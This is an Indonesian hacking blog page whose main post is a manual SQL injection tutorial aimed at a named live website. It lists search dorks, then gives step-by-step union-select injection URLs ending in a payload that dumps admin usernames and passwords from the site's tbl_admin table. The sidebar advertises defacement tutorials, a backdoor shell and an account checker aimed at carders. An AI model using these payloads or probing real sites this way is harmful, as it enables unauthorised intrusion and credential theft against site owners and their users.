Mr.GLADz404 OFFICAL

statistics

Recent

Comment

Subscribe

Popular

  • Apa itu Cloudflare ? Apa Kegunaan dari Cloudflare ?
          Beberapa hari yang lalu saya mengakses sebuah situs tetapi gagal loading dengan pesan kesalahan bahwa server sedang mengalami masalah....
  • [PHP] SCRIPT Auto Visitor Blog
    [PHP] SCRIPT Auto Visitor Blog
    Oke, kali ini saya akan membagikan SCRIPT Auto Visitor Blog :D yang biasa digunakan untuk meningkatkan Jumlah Visitor Pengunjung Blog jengje...
  • Deface Dengan Teknik CSRF Sexy Contact Form
    Oke Kali ini saya akan share tutorial deface dengan teknik  CSRF Sexy Contact Form , oke langsung saja simak :D  Alat - alatnya : Script CSR...
  • [PHP] SCRIPT Tokopedia Account Checker
    [PHP] SCRIPT Tokopedia Account Checker
      Oke , kali ini saya akan share SCRIPT akun checker , yaitu   Tokopedia Account Checker . mungkin SCRIPT ini sangat di butuhkan oleh CARDER...
  • ./Mr.GLADz404 PRIV8 SHELL Pertamax Edition
    ./Mr.GLADz404 PRIV8 SHELL Pertamax Edition
                         Maaf baru update lagi :'(  , kali ini saya akan me-Rilis Shell Backdoor , namanya yaitu  ./Mr.GLADz404 PRIV8 SHELL ...
  • Dasar Pemrogramman/Coding PHP
    Dasar Pemrogramman/Coding PHP
    Apa itu PHP? Pada tulisan ini saya ingin share tentang apa itu php. PHP dalam dunia pemrograman, bukan PHP yang diartikan Pemberi Harapan Pa...
  • Apa itu Pastebin dan Github ?
    Apa itu Pastebin dan Github ?
               Mungkin kawan - kawan tidak tahu kegunaan  Pastebin dan Github cuss langsung aja disimak :D 1. PASTEBIN (  pastebin.com  ) Apa it...
  • Webdav Exploiter Web Version
    Oke kali ini saya akan share Webdav Exploiter Web Version ,langsung aja :D Bagaimana? Jelek?? Nah untuk versi CLI anda bisa download langsun...
  • DEFACE DENGAN TEKNIK JQUERY FILE UPLOAD
    DEFACE DENGAN TEKNIK JQUERY FILE UPLOAD
    Hello , Kali ini saya akan membagikan cara deface menggunakan teknik JQuery File Upload dengan menggunakan CSRF , oke langsung saja dilakuka...
  • Apa itu CYBER WAR ?
       Pada sesi Cyber law ini dibahas tentang konsep Cyber War yang meliputi: pengertian Cyber War, Metode serangan cyberwar dan bagaimana meng...

Formulir Kontak

Nama

Email *

Pesan *

Paling Dilihat

  • Apa itu Cloudflare ? Apa Kegunaan dari Cloudflare ?
          Beberapa hari yang lalu saya mengakses sebuah situs tetapi gagal loading dengan pesan kesalahan bahwa server sedang mengalami masalah....
  • [PHP] SCRIPT Auto Visitor Blog
    [PHP] SCRIPT Auto Visitor Blog
    Oke, kali ini saya akan membagikan SCRIPT Auto Visitor Blog :D yang biasa digunakan untuk meningkatkan Jumlah Visitor Pengunjung Blog jengje...
  • Deface Dengan Teknik CSRF Sexy Contact Form
    Oke Kali ini saya akan share tutorial deface dengan teknik  CSRF Sexy Contact Form , oke langsung saja simak :D  Alat - alatnya : Script CSR...
  • [PHP] SCRIPT Tokopedia Account Checker
    [PHP] SCRIPT Tokopedia Account Checker
      Oke , kali ini saya akan share SCRIPT akun checker , yaitu   Tokopedia Account Checker . mungkin SCRIPT ini sangat di butuhkan oleh CARDER...
  • ./Mr.GLADz404 PRIV8 SHELL Pertamax Edition
    ./Mr.GLADz404 PRIV8 SHELL Pertamax Edition
                         Maaf baru update lagi :'(  , kali ini saya akan me-Rilis Shell Backdoor , namanya yaitu  ./Mr.GLADz404 PRIV8 SHELL ...
  • Dasar Pemrogramman/Coding PHP
    Dasar Pemrogramman/Coding PHP
    Apa itu PHP? Pada tulisan ini saya ingin share tentang apa itu php. PHP dalam dunia pemrograman, bukan PHP yang diartikan Pemberi Harapan Pa...
  • Apa itu Pastebin dan Github ?
    Apa itu Pastebin dan Github ?
               Mungkin kawan - kawan tidak tahu kegunaan  Pastebin dan Github cuss langsung aja disimak :D 1. PASTEBIN (  pastebin.com  ) Apa it...
  • Webdav Exploiter Web Version
    Oke kali ini saya akan share Webdav Exploiter Web Version ,langsung aja :D Bagaimana? Jelek?? Nah untuk versi CLI anda bisa download langsun...
  • DEFACE DENGAN TEKNIK JQUERY FILE UPLOAD
    DEFACE DENGAN TEKNIK JQUERY FILE UPLOAD
    Hello , Kali ini saya akan membagikan cara deface menggunakan teknik JQuery File Upload dengan menggunakan CSRF , oke langsung saja dilakuka...
  • Apa itu CYBER WAR ?
       Pada sesi Cyber law ini dibahas tentang konsep Cyber War yang meliputi: pengertian Cyber War, Metode serangan cyberwar dan bagaimana meng...
Beranda
exploit

Sql Injection Manual [Basic]

Tutorial SQL injection Manual


[+] dork google = projects.php?cat_id=
                             index.php?id= 
                             Sisanya Cari di mbah gugel , bejibun , atau kembangin sendiri
[+] hackbar = untuk permudah exploitasi
       Download  HACKBAR
[+] susu perawan dan kopi hangat

oke live target nya ini aja 
http://www.rubin-arch.co.il/projects.php?cat_id=5

1. check vulnnya pakai kutip atas ( ' ) 

[Image: RMRMp7h.png]

2. find ada berapa table menggunakan 
5 order by --
-5 order by 1--
5' order by 1--+

[Image: G1rc1d0.png]< Normal
[Image: IeS3haw.png]< error
http://www.rubin-arch.co.il/projects.php?cat_id=5 order by 6-- < Error
berarti ada 5 table di web itu Smile dan eksekusi sampai 5 aja /sebelum errornya


3.cari letak table yang di gunakan untuk eksekusi/mencari db nya
http://www.rubin-arch.co.il/projects.php?cat_id=5 union select 1,2,3,4,5-- <<< whats ? kagak muncul letaknya ? itu kurang di kasih susu perawan 
tambahin ( - ) strip di depan angka

[Image: pxJjCvC.png] < ada ni nomor 3 

4. langsung aja di dios Tongue gak perlu cari2 table dan column yang ribet 
apa itu dios ? dump in one shop Tongue sekali tusuk langsung masuk
[Image: bPEOCOD.png]< ini ss nya free pakai yang mana aja diosnya
asal jangan WAF Tongue klo waf untuk website yang terdeteksi waf lah 
macam forbidden , not acceptable , denied ahaha

5. itu sudah jelas letak user dan pass adminnya ada di tbl_admin
langsung inject bray

http://www.rubin-arch.co.il/projects.php?cat_id=-5 union select 1,2,group_concat(user_name,0x7c,user_pass),4,5 from tbl_admin-- 

terettereteret ketemukan 

[Image: IKtgssj.png]

so simple ? 

Terima kasih kepada HumanEdoTensei atas tutorial nya ini :D
Menasihati diri sendiri merupakan salah satu tugas yang tersulit. Karena yang akan melawan nasihat tersebut, adalah diri sendiri.